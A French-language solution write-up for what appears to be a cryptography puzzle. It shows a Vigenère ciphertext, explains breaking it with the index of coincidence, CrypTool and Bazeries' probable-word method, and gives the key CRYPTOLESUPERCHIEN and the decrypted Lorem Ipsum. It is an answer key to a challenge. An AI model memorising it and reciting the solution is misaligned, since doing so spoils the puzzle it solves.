IG ORSGBG TR MN XR, MGS ZMFWJ KTMID, IYYI ICGPNIAF HSPF DPPDYCXVUXCI, RTRR KBHLI SGTX EWSTE NOVR LBGT. PWWIYJ TPAYF UVB IKWDXAKJI ECAWUHG, LR EKOPWWHIMLO KQKAKJQXF QZQEISS KCJQXV, GXCHMOD PSWJW JWZXIAFZQHX WYXWATV MQSCXCCK FTGRCIJCI WFNSQGVVLBXG. OFKMY TVFU SMS YGF NATQPVSN LMJK, UCPYC ESAEOX RMFAE WGYUIAVLK KNZAYLUII, EQU VYYNRK. EHGFIJY SEGKICW ZCJQP GIWPSG, XR GJHAIYNLQ TN IE YL MDPCKJQXHFZL, HTUTXLCH ET ULU IHKJKDW ALIUYCEJ GUQQ WWJRD, TQ TH NIAYKRHB MA UVB HXBPGLOH. WRGWM QNWIGH FOFVAM, IICNBA WRF DYVGO WEUOH, RLPJ QR GCTGIB, GLKANIMJ JLVHEGIGI OWEEW HXFY RVZXGKKMG TQ WEUCCMR. WSBVVEVQ RHBOMEYCXLO, SMGGWJ LJGQ DEYCIXZU YPSAELQ. TM BPUMY UETKSQWVU R LXLZ NSFMTULCA BMAEZBJGH, EIDFJW MGZBMOWCSB MSWPMM TPVKMMRQ, PLJAT GTX NYA ICGTMRGWD ZXUSYHMG, AETWZ MYVUDMS XZPQWHIYD C, UWRHODW JEHCMUYH EDGA XLNTVRGT. JPRWHPXZU SWVRO, LR PGHP, RGH YYJVV QR IGC NDKHL EMAJI, UQUMG FWJAXIWE PGVDVKKZ MY ZCLPXL, HCMKNXULG HTMDWVR BTUYE UOGESKACV FKK.

JDKSX TWFAIEVLAUHG VJXM QFVSVXXLT, PVXRIVP PNUFI AH UETKSQWVU VPPM COMG GPYIKZ, AYFRVLSBGDI WATX ZPAMKRT JCFNW AIFUIMSWZ IH. ZK TPPL TCMFAXPCC SIGVPZY, RHAXSVI AMXWSI ZRNZR TEWE EEYI. RZUS VIP, CK TTE OWMIOPQ CKNCPN, UVB KXZ DIE GPYIKZ DIY WCJPFQZVHYG HFNVZ, HVCD LJEZL, IL MTQ MGZBMOWCSB LWE. ZWFXX EGJ, TIPVLQ JM, RZRWW XR DCLKIACJ PXLID XWGESI, EVUQBFF LTV SEMSG EYCXPVEE, DCYCWWE YL XXW. AWZBS EKJSH VCYWWKJEK PPJL FGU BJBG, XEYHXW CGJBYF FZAINA AVSYHIEV YQWHU JSHISYHAMHI WCJQPVUZ, YRVIXWSH ELRULTPHU LR P WOAMTOH HLKZ, VEZ CDCI THBYW, UR RFP HB EP FLGH EONYK HTG. GJHAIYNLQ GBGFW VYAITVBA RVDY, TXOOXYK HTG, RNPYYNO HSPF GPH HBPVVVYI. MA HVSVBOE MFNTVUWT IX RV, VR XG JPP VCVRZUZQQ, NOVR KTFTYK HXFY YPAM YWTRJL JFPHOIEKG. TIWFC GMGMO GEJCJW FFPW ZRN. UGVGWDWAG TKVUAIW NWTRDK JPVG, XDRVE WTEPGIYI IFZMF, LXHZEBTYF JVLSKSCML PJPGWAIXR YZQX TAPX, EUIXZU LOIFVRQ, IHFESJ NJVGKZ CX EWKPJF BPG.

Si l'on commence par une analyse de fréquence et un calcul de l'indice de coïncidence et sachant qu'un Lorem Ipsum possède un IC de plus de 0.07. On tombe sur 0.040046315846048 signifiant que l'on a affaire à une méthode poly-alphabétique, la plus connue étant le carré de vigenère. La façon la plus rapide d'avoir la réponse est d'utiliser le logiciel Cryptool 1.4.21.

En deux clics ont obtient la clef suivante : CRYPTOLESUPERCHIEN

Et le texte décrypté suivant :

LOREM IPSUM DOLOR SIT AMET, DUI PELLENTESQUE PARTURIENT CONSEQUAT MASSA VENENATIS NEC, URNA SED RHONCUS RISUS IACULIS. ULTRICIES NEC NEQUE SAPIEN IPSUM, NUNC VIVAMUS VOLUPTATE DUI SUSCIPIT TRISTIQUE, NEQUE MUS EU ETIAM, MAGNA FACILISIS LACUS DIAM. SUSPENDISSE SCELERISQUE LECTUS ARCU UT. MASSA CONVALLIS EST SAPIEN ERAT UT, TINCIDUNT LOREM ALIQUAM, ID AT PHASELLUS ARCU AT ELIT, MAGNA DONEC AENEAN VENENATIS ET URNA, MONTES EU SED. LECTUS MAURIS SCELERISQUE SIT PEDE SED ET, SUSPENDISSE UT FERMENTUM SCELERISQUE, ET DICTUMST VOLUTPAT DIGNISSIM ANTE NUNC MOLLIS, ERAT SEM ID RISUS MAURIS. PROIN PROIN, ODIO NEC PHARETRA NON, PRETIUM PORTA METUS PORTA ARCU ID DOLOR, CORPORIS LEO, FRINGILLA A. VEHICULA VOLUTPAT TELLUS MOLLIS AENEAN A PER, TORTOR CONDIMENTUM NON, IMPERDIET ANTE EST ALIQUET PROIDENT, INTERDUM TURPIS JUSTO IPSUM MAGNA EU LIBERO. SIT VITAE, A DIAM FEUGIAT FELIS NIBH FACILISIS VULPUTATE, SUSCIPIT VENENATIS ULLAMCORPER VITAE, EGET NEQUE VESTIBULUM LACUS ERAT MONTES. SED DAPIBUS QUIS SED ODIO.

INTEGER CONUBIA DONEC ENIM UT MAURIS, ORCI MAURIS NIBH LACUS DIAM EU, AT AMET MI, LECTUS AMET ENIM VITAE PEDE SUSCIPIT. BLANDIT MALESUADA, PELLENTESQUE IN ORNARE MUS CRAS GRAVIDA, SIT EGET FELIS WISI. ULTRICIES IN SED AUGUE DIGNISSIM, MALESUADA SAGITTIS SIT, EGESTAS SODALES CONGUE COMMODO INTEGER. QUIS VITAE DICTUM ODIO ET ET, AD ADIPISCING POSUERE, SODALES BLANDITIIS WISI EGET NULLA ORCI. FUSCE MORBI QUIS MOLLIS A NUNC, AENEAN IN LIGULA QUIS, MOLLIS TELLUS JUSTO EGET RUTRUM, UT DIGNISSIM TINCIDUNT DUIS VENENATIS. SAPIEN SAPIEN LITORA SUSPENDISSE PRETIUM, SED PENATIBUS, MOLESTIE ULTRICES VULPUTATE NON UT EROS TEMPUS. ULTRICIES MI ET AMET. MI VOLUTPAT ADIPISCING ERAT CONDIMENTUM NON VEL. VITAE IACULIS, NON QUIS IN DIGNISSIM QUAM IN. VESTIBULUM SED FAUCIBUS FAUCIBUS VIVAMUS, SUSCIPIT PRETIUM, NULLA SAPIEN ID QUISQUE, FERMENTUM MI TEMPOR MASSA METUS. UT DAPIBUS ORNARE NUNC VITAE IPSUM ELIT, BIBENDUM ID RISUS MAURIS IN. DIAM PORTTITOR EROS SCELERISQUE VEL VIVAMUS, ID IN CONSECTETUER AENEAN DICTUM ANTE.

ET MAURIS IN UT IN, VEL RISUS METUS, EGET ELEIFEND QUAM PELLENTESQUE, ERAT VITAE AMET NULLA AMET WISI. LECTUS RISUS SED TRISTIQUE NATOQUE, UT PRAESENTIUM DIGNISSIM COMMODO TACITI, EGESTAS LACUS SUSPENDISSE INTEGER VOLUTPAT HENDRERIT SOLLICITUDIN. AUGUE EROS LEO LEO PLACERAT WISI, NULLA NULLAM NULLA FERMENTUM VULPUTATE, NON NULLAM. POSUERE DAPIBUS MASSA NULLAM, IN PHASELLUS EU UT UT SOLLICITUDIN, SAGITTIS AC SEM EUISMOD MAECENAS ENIM JUSTO, AC ID VOLUTPAT IN SED SENECTUS. SAEPE MAURIS MAURIS, TELLUS SED MAGNA LACUS, NUNC IN TACITI, SAGITTIS HENDRERIT VITAE NIBH PORTTITOR AC LACINIA. ULTRICES CONDIMENTUM, LECTUS NUNC SAGITTIS RHONCUS. ET NEQUE FACILISIS A NISL CONSEQUAT TINCIDUNT, TELLUS VESTIBULUM TELLUS ELEIFEND, NULLA SIT VEL ELEMENTUM BIBENDUM, LACUS EUISMOD ELEMENTUM A, NONUMMY ULTRICES AMET PHARETRA. VENENATIS LOREM, UT ANTE, NON JUSTO IN VEL PORTA AUGUE, DONEC SUSCIPIT LOBORTIS EU MAURIS, TRISTIQUE ALIQUET MAGNA CURABITUR SIT.

LOREM PELLENTESQUE ELIT CURABITUR, INTEGER AUGUE IN FACILISIS ERAT ODIO MAURIS, SUSPENDISSE EGET INTEGER SEQUI PENATIBUS AD. MI CRAS FRINGILLA LACINIA, COMMODO LIGULA VELIT ELIT AMET. NISL NEC, AT VEL ALIQUAM LIGULA, SED VEL SEM MAURIS VEL ULLAMCORPER DOLOR, DIAM NULLA, ET SEM VESTIBULUM SIT. VELIT NEC, LECTUS UT, DONEC IN MAECENAS RISUS TEMPOR, COMMODO NEC ETIAM PULVINAR, BLANDIT UT DIS. JUSTO RISUS CONSEQUAT NIBH SED DUIS, MAGNIS LECTUS DICTUM PRAESENT RISUS SUSPENDISSE FACILISI, ACCUMSAN PHASELLUS UT A DAPIBUS DUIS, NAM AMET ATQUE, AC NON AT AC DUIS LACUS NEC. PHASELLUS RISUS DELECTUS NIBH, VIVAMUS NEC, ALIQUAM QUAM SED PHARETRA. IN FEUGIAT INTERDUM AT ET, ET IN VEL DIGNISSIM, AMET VARIUS NIBH WISI LUCTUS VULPUTATE. MASSA PORTA VARIUS ODIO VEL. DIGNISSIM EGESTAS AUCTOR VERO, DONEC PLACERAT PROIN, RIDICULUS HENDRERIT VULPUTATE WISI AMET, MATTIS EGESTAS, TORTOR TURPIS UT RUTRUM NEC.

Comment faire sans outils ?

En utilisant la méthode de recherche de mot probable du commandant bazeries : http://www.apprendre-en-ligne.net/crypto/vigenere/motprobvig.html

En ce basant sur la probabilité assez grande que le texte commence par "loremipsum" on trouvait CRYPTOLESU.

Qui indiquait que l'on avait affaire à une clef plus grande que 10.

La suite la plus classique étant Lorem ipsum dolor sit amet consectetur adipiscing elit. Et avec cette méthode on trouvait alors : CRYPTOLESUPERCHIENCRYPUUGBSDHELBUARZRYGEEVWILZP

On tombait aussi facilement sur la clef !

- page 1 of 2